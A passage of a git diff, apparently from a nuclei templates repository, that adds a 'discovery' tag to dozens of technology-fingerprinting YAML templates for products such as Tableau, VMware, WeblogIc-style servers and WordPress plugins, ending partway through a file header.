diff --git a/http/technologies/synology-web-station.yaml b/http/technologies/synology-web-station.yaml index 2df8b2cbe06..86649932994 100644 --- a/http/technologies/synology-web-station.yaml +++ b/http/technologies/synology-web-station.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,synology,edb + tags: tech,synology,edb,discovery http: - method: GET diff --git a/http/technologies/tableau-server-detect.yaml b/http/technologies/tableau-server-detect.yaml index 4c2bc0d97e9..e1bd2c1bb7e 100644 --- a/http/technologies/tableau-server-detect.yaml +++ b/http/technologies/tableau-server-detect.yaml @@ -20,7 +20,7 @@ info: - server=="Tableau" - icon_hash="-1441956789" zoomeye-query: app:"Tableau Server" - tags: tech,detect,tableau,salesforce + tags: tech,detect,tableau,salesforce,discovery http: - method: GET diff --git a/http/technologies/teccom-openmessaging-detect.yaml b/http/technologies/teccom-openmessaging-detect.yaml index 818e3d6479b..9db27c6b5c1 100644 --- a/http/technologies/teccom-openmessaging-detect.yaml +++ b/http/technologies/teccom-openmessaging-detect.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: html:"www.teccom-eu.net/wsdl" - tags: tech,teccom,tecconnect,eol,wsdl + tags: tech,teccom,tecconnect,eol,wsdl,discovery http: - method: GET diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index f19f75b5d58..c6a9c274d56 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech + tags: tech,discovery http: - method: GET diff --git a/http/technologies/telerik/telerik-dialoghandler-detect.yaml b/http/technologies/telerik/telerik-dialoghandler-detect.yaml index 10e11ba9ec8..49fceb0d6ec 100644 --- a/http/technologies/telerik/telerik-dialoghandler-detect.yaml +++ b/http/technologies/telerik/telerik-dialoghandler-detect.yaml @@ -10,7 +10,7 @@ info: - https://github.com/bao7uo/dp_crypto metadata: max-request: 17 - tags: tech,telerik,asp + tags: tech,telerik,asp,discovery http: - method: GET diff --git a/http/technologies/telerik/telerik-fileupload-detect.yaml b/http/technologies/telerik/telerik-fileupload-detect.yaml index 303fe3729d3..45d053eeb61 100644 --- a/http/technologies/telerik/telerik-fileupload-detect.yaml +++ b/http/technologies/telerik/telerik-fileupload-detect.yaml @@ -7,7 +7,7 @@ info: description: This template detects the Telerik Web UI fileupload handler. metadata: max-request: 1 - tags: tech,telerik,fileupload,intrusive + tags: tech,telerik,fileupload,intrusive,discovery http: - method: GET diff --git a/http/technologies/teradici-pcoip.yaml b/http/technologies/teradici-pcoip.yaml index d31f5bfea4e..1e2fd88fcd0 100644 --- a/http/technologies/teradici-pcoip.yaml +++ b/http/technologies/teradici-pcoip.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,pcoip + tags: tech,pcoip,discovery http: - method: GET diff --git a/http/technologies/terraform-detect.yaml b/http/technologies/terraform-detect.yaml index 001461a60e9..fae16f4b624 100644 --- a/http/technologies/terraform-detect.yaml +++ b/http/technologies/terraform-detect.yaml @@ -7,7 +7,7 @@ info: description: Write Infrastructure as Code - https://www.terraform.io/ metadata: max-request: 1 - tags: tech,terraform + tags: tech,terraform,discovery http: - method: GET diff --git a/http/technologies/thinkcmf-detect.yaml b/http/technologies/thinkcmf-detect.yaml index 3f1ef7fb869..fb23636d057 100644 --- a/http/technologies/thinkcmf-detect.yaml +++ b/http/technologies/thinkcmf-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,thinkcmf,login,tech + tags: panel,thinkcmf,login,tech,discovery http: - method: GET diff --git a/http/technologies/thinkphp-detect.yaml b/http/technologies/thinkphp-detect.yaml index 971d7df352e..d4486f1a01e 100644 --- a/http/technologies/thinkphp-detect.yaml +++ b/http/technologies/thinkphp-detect.yaml @@ -17,7 +17,7 @@ info: fofa-query: app="ThinkPHP" product: thinkphp vendor: thinkphp - tags: thinkphp,tech,detect,intrusive + tags: thinkphp,tech,detect,intrusive,discovery http: - method: GET diff --git a/http/technologies/tibco-businessconnect-detect.yaml b/http/technologies/tibco-businessconnect-detect.yaml index 79b65a617d3..cbd759c50bf 100644 --- a/http/technologies/tibco-businessconnect-detect.yaml +++ b/http/technologies/tibco-businessconnect-detect.yaml @@ -16,7 +16,7 @@ info: vendor: tibco product: businessconnect shodan-query: http.html:"TIBCO BusinessConnect" - tags: tibco,detect,tech + tags: tibco,detect,tech,discovery http: - method: GET diff --git a/http/technologies/tibco-spotfire-services-detect.yaml b/http/technologies/tibco-spotfire-services-detect.yaml index 5a6b7165b76..d3400b6855c 100644 --- a/http/technologies/tibco-spotfire-services-detect.yaml +++ b/http/technologies/tibco-spotfire-services-detect.yaml @@ -16,7 +16,7 @@ info: vendor: tibco product: spotfire_statistics_services shodan-query: "TIBCO Spotfire Server" - tags: tech,tibco,detect + tags: tech,tibco,detect,discovery http: - method: GET diff --git a/http/technologies/tileserver-gl.yaml b/http/technologies/tileserver-gl.yaml index 84c76daafb1..56325de01d1 100644 --- a/http/technologies/tileserver-gl.yaml +++ b/http/technologies/tileserver-gl.yaml @@ -18,7 +18,7 @@ info: google-query: intitle:"TileServer GL - Server for vector and raster maps with GL styles" product: tileservergl vendor: tileserver - tags: tech,tileserver,edb + tags: tech,tileserver,edb,discovery http: - method: GET diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml index b9c64afc559..a3fa508e277 100644 --- a/http/technologies/tinyproxy-detect.yaml +++ b/http/technologies/tinyproxy-detect.yaml @@ -16,7 +16,7 @@ info: vendor: tinyproxy_project product: tinyproxy shodan-query: "Server: tinyproxy" - tags: tech,proxy,detect + tags: tech,proxy,detect,discovery http: - method: GET diff --git a/http/technologies/topdesk-detect.yaml b/http/technologies/topdesk-detect.yaml index 658f18603d8..61e1c796d30 100644 --- a/http/technologies/topdesk-detect.yaml +++ b/http/technologies/topdesk-detect.yaml @@ -11,7 +11,7 @@ info: max-requests: 1 shodan-query: html:"TOPdesk" fofa-query: app="TOPdesk" - tags: topdesk,tech,detect + tags: topdesk,tech,detect,discovery http: - method: GET diff --git a/http/technologies/tor-socks-proxy.yaml b/http/technologies/tor-socks-proxy.yaml index 9810ca42459..d35cfcd235f 100644 --- a/http/technologies/tor-socks-proxy.yaml +++ b/http/technologies/tor-socks-proxy.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,tor,proxy + tags: tech,tor,proxy,discovery http: - method: GET diff --git a/http/technologies/torchserve-detect.yaml b/http/technologies/torchserve-detect.yaml index 06cdbd9af99..eee0f661dca 100644 --- a/http/technologies/torchserve-detect.yaml +++ b/http/technologies/torchserve-detect.yaml @@ -12,7 +12,7 @@ info: vendor: pytorch product: torchserve fofa-query: body="Requested method is not allowed, please refer to API document" - tags: tech,pytorch,api + tags: tech,pytorch,api,discovery http: - method: GET diff --git a/http/technologies/tornado-server-login.yaml b/http/technologies/tornado-server-login.yaml index 8d4947b09d2..99cb9191153 100644 --- a/http/technologies/tornado-server-login.yaml +++ b/http/technologies/tornado-server-login.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Tornado - Login" - tags: panel,tornado,tech + tags: panel,tornado,tech,discovery http: - method: GET diff --git a/http/technologies/twenty-detect.yaml b/http/technologies/twenty-detect.yaml index 5a0f00b972b..eb5c38ed7d9 100644 --- a/http/technologies/twenty-detect.yaml +++ b/http/technologies/twenty-detect.yaml @@ -1,28 +1,28 @@ -id: twenty-detect - -info: - name: Twenty - Detect - author: righettod - severity: info - description: | - Twenty products was detected. - reference: - - https://github.com/twentyhq/twenty - - https://twenty.com/ - metadata: - max-request: 1 - shodan-query: http.title:"Twenty" - tags: tech,twenty,detect - -http: - - method: GET - path: - - "{{BaseURL}}/welcome" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_all(to_lower(body), "twenty", "open-source crm")' +id: twenty-detect + +info: + name: Twenty - Detect + author: righettod + severity: info + description: | + Twenty products was detected. + reference: + - https://github.com/twentyhq/twenty + - https://twenty.com/ + metadata: + max-request: 1 + shodan-query: http.title:"Twenty" + tags: tech,twenty,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/welcome" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(to_lower(body), "twenty", "open-source crm")' condition: and # digest: 490a0046304402202528eb566f5e63354e7563cfd65bd21ca6bba97ff32a024e82f3be94a16d94020220559b12dbd59637b8ac3b8908b010c974d755759a2ddf161e90b9d067ada7b985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/tyk-gateway-detect.yaml b/http/technologies/tyk-gateway-detect.yaml index c86a67e1465..1b900afde14 100644 --- a/http/technologies/tyk-gateway-detect.yaml +++ b/http/technologies/tyk-gateway-detect.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: tyk,gateway,tech,detect + tags: tyk,gateway,tech,detect,discovery http: - method: GET diff --git a/http/technologies/typo3-detect.yaml b/http/technologies/typo3-detect.yaml index 0f9c4ffe961..bb14d842f3e 100644 --- a/http/technologies/typo3-detect.yaml +++ b/http/technologies/typo3-detect.yaml @@ -11,7 +11,7 @@ info: vendor: typo3 product: typo3 shodan-query: http.component:"TYPO3" - tags: tech,typo3 + tags: tech,typo3,discovery http: - method: GET diff --git a/http/technologies/uni-gui-framework.yaml b/http/technologies/uni-gui-framework.yaml index 27667265d2b..601c45517be 100644 --- a/http/technologies/uni-gui-framework.yaml +++ b/http/technologies/uni-gui-framework.yaml @@ -1,5 +1,5 @@ -id: uni-gui-framework - +id: uni-gui-framework + info: name: UniGUI Framework - Detect author: serrapa @@ -10,42 +10,42 @@ info: verified: true max-request: 1 shodan-query: http.title:"UniGUI" - tags: tech,unigui + tags: tech,unigui,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "uni-xtheme-" - - "ext-all.js" - - "uniVars._extVer=" - condition: or - - - type: regex - part: body - regex: - - 'uni-(\d+\.\d+\.\d+\.\d+)/' - - 'uniVars._extVer="(\d+\.\d+\.\d+)"' - - extractors: - - type: regex - part: body - name: uni_gui_version - regex: - - 'uni-(\d+\.\d+\.\d+\.\d+)' - - - type: regex - part: body - name: ext_js_version - regex: +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "uni-xtheme-" + - "ext-all.js" + - "uniVars._extVer=" + condition: or + + - type: regex + part: body + regex: + - 'uni-(\d+\.\d+\.\d+\.\d+)/' + - 'uniVars._extVer="(\d+\.\d+\.\d+)"' + + extractors: + - type: regex + part: body + name: uni_gui_version + regex: + - 'uni-(\d+\.\d+\.\d+\.\d+)' + + - type: regex + part: body + name: ext_js_version + regex: - 'uniVars._extVer="(\d+\.\d+\.\d+)"' # digest: 4a0a00473045022049d89cb9de6c9453826c554faf1526eee9dd6fab8e7de27e54419032895c2e590221009a09dbcf44513725b673506236361e475ee385036bb3b64613c397f08de6aa43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/utility-service-detect.yaml b/http/technologies/utility-service-detect.yaml index ea4d1ea87f3..090b4b95f39 100644 --- a/http/technologies/utility-service-detect.yaml +++ b/http/technologies/utility-service-detect.yaml @@ -12,7 +12,7 @@ info: vendor: avaya product: aura_utility_services shodan-query: title:"Utility Services Administration" - tags: tech,avaya,aura + tags: tech,avaya,aura,discovery http: - method: GET diff --git a/http/technologies/vbulletin-detect.yaml b/http/technologies/vbulletin-detect.yaml index 7beef8c5c9c..559061245a0 100644 --- a/http/technologies/vbulletin-detect.yaml +++ b/http/technologies/vbulletin-detect.yaml @@ -16,7 +16,7 @@ info: product: vbulletin shodan-query: title:"Powered By vBulletin" google-query: intext:"Powered By vBulletin" - tags: tech,vbulletin + tags: tech,vbulletin,discovery http: - method: GET diff --git a/http/technologies/versa-flexvnf-server.yaml b/http/technologies/versa-flexvnf-server.yaml index 41afdd286c4..61f7bc69492 100644 --- a/http/technologies/versa-flexvnf-server.yaml +++ b/http/technologies/versa-flexvnf-server.yaml @@ -10,7 +10,7 @@ info: - https://versa-networks.com/products/components/ metadata: max-request: 1 - tags: tech,versa,flexvnf + tags: tech,versa,flexvnf,discovery http: - method: GET diff --git a/http/technologies/versa/versa-analytics-server.yaml b/http/technologies/versa/versa-analytics-server.yaml index c025228deb5..54d8c972c61 100644 --- a/http/technologies/versa/versa-analytics-server.yaml +++ b/http/technologies/versa/versa-analytics-server.yaml @@ -14,7 +14,7 @@ info: vendor: versa-networks product: versa_analytics shodan-query: "Versa-Analytics-Server" - tags: tech,versa,analytics + tags: tech,versa,analytics,discovery http: - method: GET diff --git a/http/technologies/versa/versa-director-api.yaml b/http/technologies/versa/versa-director-api.yaml index 01de39aee62..a4105487d81 100644 --- a/http/technologies/versa/versa-director-api.yaml +++ b/http/technologies/versa/versa-director-api.yaml @@ -15,7 +15,7 @@ info: vendor: versa-networks product: versa_director shodan-query: html:"Versa Networks" - tags: api,versa,tech + tags: api,versa,tech,discovery http: - method: GET diff --git a/http/technologies/versa/versa-networks-detect.yaml b/http/technologies/versa/versa-networks-detect.yaml index aac42eccf98..e9ea0731f0a 100644 --- a/http/technologies/versa/versa-networks-detect.yaml +++ b/http/technologies/versa/versa-networks-detect.yaml @@ -14,7 +14,7 @@ info: vendor: versa-networks product: versa_analytics shodan-query: html:"Versa Networks" - tags: tech,versa + tags: tech,versa,discovery http: - method: GET diff --git a/http/technologies/vertigis-detect.yaml b/http/technologies/vertigis-detect.yaml index fd994c7833a..ee5a3443755 100644 --- a/http/technologies/vertigis-detect.yaml +++ b/http/technologies/vertigis-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 9 shodan-query: http.title:"vertigis" - tags: tech,vertigis,detect + tags: tech,vertigis,detect,discovery http: - method: GET diff --git a/http/technologies/vivotex-web-console-detect.yaml b/http/technologies/vivotex-web-console-detect.yaml index 7933b5edf2d..e589ec4ad0e 100644 --- a/http/technologies/vivotex-web-console-detect.yaml +++ b/http/technologies/vivotex-web-console-detect.yaml @@ -12,7 +12,7 @@ info: product: ip7361 shodan-query: title:"VIVOTEK Web Console" fofa-query: app="VIVOTEK-Web-Console" - tags: tech,vivotex,console + tags: tech,vivotex,console,discovery http: - method: GET diff --git a/http/technologies/vmware/vmware-detect.yaml b/http/technologies/vmware/vmware-detect.yaml index 553b6ce66e9..147ba646879 100644 --- a/http/technologies/vmware/vmware-detect.yaml +++ b/http/technologies/vmware/vmware-detect.yaml @@ -10,7 +10,7 @@ info: - https://svn.nmap.org/nmap/scripts/vmware-version.nse metadata: max-request: 1 - tags: tech,vcenter,vmware + tags: tech,vcenter,vmware,discovery http: - raw: diff --git a/http/technologies/vmware/vmware-horizon-version.yaml b/http/technologies/vmware/vmware-horizon-version.yaml index d347721f78b..75b0bc4d44b 100644 --- a/http/technologies/vmware/vmware-horizon-version.yaml +++ b/http/technologies/vmware/vmware-horizon-version.yaml @@ -12,7 +12,7 @@ info: vendor: vmware product: horizon_view shodan-query: title:"Vmware Horizon" - tags: vmware,tech + tags: vmware,tech,discovery http: - method: GET diff --git a/http/technologies/vmware/vmware-site-recovery-manager.yaml b/http/technologies/vmware/vmware-site-recovery-manager.yaml index d130f7096cd..bb15b31d393 100644 --- a/http/technologies/vmware/vmware-site-recovery-manager.yaml +++ b/http/technologies/vmware/vmware-site-recovery-manager.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to VMware Site Recovery Manager" - tags: panel,vmware,tech + tags: panel,vmware,tech,discovery http: - method: GET diff --git a/http/technologies/vmware/vmware-vrealize-detect.yaml b/http/technologies/vmware/vmware-vrealize-detect.yaml index a8298f8fcfc..4393cc52fa7 100644 --- a/http/technologies/vmware/vmware-vrealize-detect.yaml +++ b/http/technologies/vmware/vmware-vrealize-detect.yaml @@ -7,7 +7,7 @@ info: description: Version of VMware vRealize Operations Manager metadata: max-request: 1 - tags: vmware,vrealize,tech + tags: vmware,vrealize,tech,discovery http: - method: GET diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index 0d127077421..f9ca42b80ef 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: waf,tech,misc + tags: waf,tech,misc,discovery http: - raw: diff --git a/http/technologies/web-ftp-detect.yaml b/http/technologies/web-ftp-detect.yaml index a2bedd761fa..7a62fd6d56b 100644 --- a/http/technologies/web-ftp-detect.yaml +++ b/http/technologies/web-ftp-detect.yaml @@ -7,7 +7,7 @@ info: reference: https://www.exploit-db.com/ghdb/7013 metadata: max-request: 1 - tags: webftp,tech,ftp + tags: webftp,tech,ftp,discovery http: - method: GET diff --git a/http/technologies/web-suite-detect.yaml b/http/technologies/web-suite-detect.yaml index 69c116f8624..9289914676c 100644 --- a/http/technologies/web-suite-detect.yaml +++ b/http/technologies/web-suite-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 3 fofa-query: Web Suite 2021 Login - tags: tech,web-suite + tags: tech,web-suite,discovery http: - method: GET diff --git a/http/technologies/weblogic-detect.yaml b/http/technologies/weblogic-detect.yaml index 2685da41196..b98412594f3 100644 --- a/http/technologies/weblogic-detect.yaml +++ b/http/technologies/weblogic-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: product:"Oracle Weblogic" - tags: tech,weblogic,intrusive + tags: tech,weblogic,intrusive,discovery http: - method: GET diff --git a/http/technologies/webswing-api-version-detect.yaml b/http/technologies/webswing-api-version-detect.yaml index 8b84be7d1cc..6eb4c962722 100644 --- a/http/technologies/webswing-api-version-detect.yaml +++ b/http/technologies/webswing-api-version-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: 'Server: webswing.org' - tags: webswing,rest,api,version,detect + tags: webswing,rest,api,version,detect,discovery http: - method: GET diff --git a/http/technologies/werkzeug-debugger-detect.yaml b/http/technologies/werkzeug-debugger-detect.yaml index d00ac6b93a7..5893005615b 100644 --- a/http/technologies/werkzeug-debugger-detect.yaml +++ b/http/technologies/werkzeug-debugger-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,werkzeug + tags: tech,werkzeug,discovery http: - method: GET diff --git a/http/technologies/wiki-js-detect.yaml b/http/technologies/wiki-js-detect.yaml index 8943d937ce4..7f18afb5d48 100644 --- a/http/technologies/wiki-js-detect.yaml +++ b/http/technologies/wiki-js-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"wiki.js" - tags: tech,wiki-js,detect + tags: tech,wiki-js,detect,discovery http: - method: GET diff --git a/http/technologies/windows-communication-foundation-detect.yaml b/http/technologies/windows-communication-foundation-detect.yaml index 51dea6fbb48..2acffa2144e 100644 --- a/http/technologies/windows-communication-foundation-detect.yaml +++ b/http/technologies/windows-communication-foundation-detect.yaml @@ -9,7 +9,7 @@ info: vendor: windows product: wcf shodan-query: http.title:"Service" - tags: tech,wcf,windows + tags: tech,wcf,windows,discovery http: - method: GET diff --git a/http/technologies/wing-ftp-service-detect.yaml b/http/technologies/wing-ftp-service-detect.yaml index 0aa949c2e34..67022c10ba8 100644 --- a/http/technologies/wing-ftp-service-detect.yaml +++ b/http/technologies/wing-ftp-service-detect.yaml @@ -14,7 +14,7 @@ info: vendor: wftpserver product: wing_ftp_server shodan-query: "Wing FTP Server" - tags: tech,ftp,wing,detect + tags: tech,ftp,wing,detect,discovery http: - method: GET diff --git a/http/technologies/winrm-detect.yaml b/http/technologies/winrm-detect.yaml index 46470c1224f..ee3d7babc0c 100644 --- a/http/technologies/winrm-detect.yaml +++ b/http/technologies/winrm-detect.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: product:"WinRM" - tags: network,winrm,windows + tags: network,winrm,windows,discovery http: - method: POST diff --git a/http/technologies/wms-server-detect.yaml b/http/technologies/wms-server-detect.yaml index b6cd49495e2..53394d42659 100644 --- a/http/technologies/wms-server-detect.yaml +++ b/http/technologies/wms-server-detect.yaml @@ -12,7 +12,7 @@ info: vendor: wms_project product: wms fofa-query: app="WmsServer" - tags: tech,wms,httpserver + tags: tech,wms,httpserver,discovery http: - method: GET diff --git a/http/technologies/wondercms-detect.yaml b/http/technologies/wondercms-detect.yaml index cb4eaa30af4..2b45d4fb30e 100644 --- a/http/technologies/wondercms-detect.yaml +++ b/http/technologies/wondercms-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,wondercms + tags: tech,wondercms,discovery http: - method: GET diff --git a/http/technologies/woodpecker-detect.yaml b/http/technologies/woodpecker-detect.yaml index 44f7b620684..b87d1ba3237 100644 --- a/http/technologies/woodpecker-detect.yaml +++ b/http/technologies/woodpecker-detect.yaml @@ -13,7 +13,7 @@ info: verified: true shodan-query: http.title:"woodpecker" max-request: 1 - tags: tech,woodpecker,detect + tags: tech,woodpecker,detect,discovery http: - method: GET diff --git a/http/technologies/wordpress-detect.yaml b/http/technologies/wordpress-detect.yaml index 3ef3dfee010..527578c5b3c 100644 --- a/http/technologies/wordpress-detect.yaml +++ b/http/technologies/wordpress-detect.yaml @@ -16,7 +16,7 @@ info: - http.component:"wordpress" - cpe:"cpe:2.3:a:wordpress:wordpress" category: cms - tags: tech,wordpress,cms,wp + tags: tech,wordpress,cms,wp,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 701e81b73ee..cdc4d4d1d8e 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 5023144e11a..27b88faa231 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4e9b8d6344d..5261d9792a0 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/adminimize.yaml b/http/technologies/wordpress/plugins/adminimize.yaml index 235a8da6471..25dbc8614c6 100644 --- a/http/technologies/wordpress/plugins/adminimize.yaml +++ b/http/technologies/wordpress/plugins/adminimize.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: adminimize wpscan: https://wpscan.com/plugin/adminimize - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cfee9b29528..eacd4e7b0dc 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 81e7837eede..28bb140a4e6 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index c9fc2ff3d8e..bda42675662 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 0504e968359..d1b454f7f88 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 8d6d22df658..f0ccdc07bf8 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8c8e532d509..7a530a77afd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0e832484092..ab754fe3b21 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 4926a184223..cfdf06ad968 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/aryo-activity-log.yaml b/http/technologies/wordpress/plugins/aryo-activity-log.yaml index ea7d2379e8e..969959a3dfc 100644 --- a/http/technologies/wordpress/plugins/aryo-activity-log.yaml +++ b/http/technologies/wordpress/plugins/aryo-activity-log.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: aryo-activity-log wpscan: https://wpscan.com/plugin/aryo-activity-log - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 124eb3da461..02160da116a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index f63043f3cd9..1381e3afe11 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 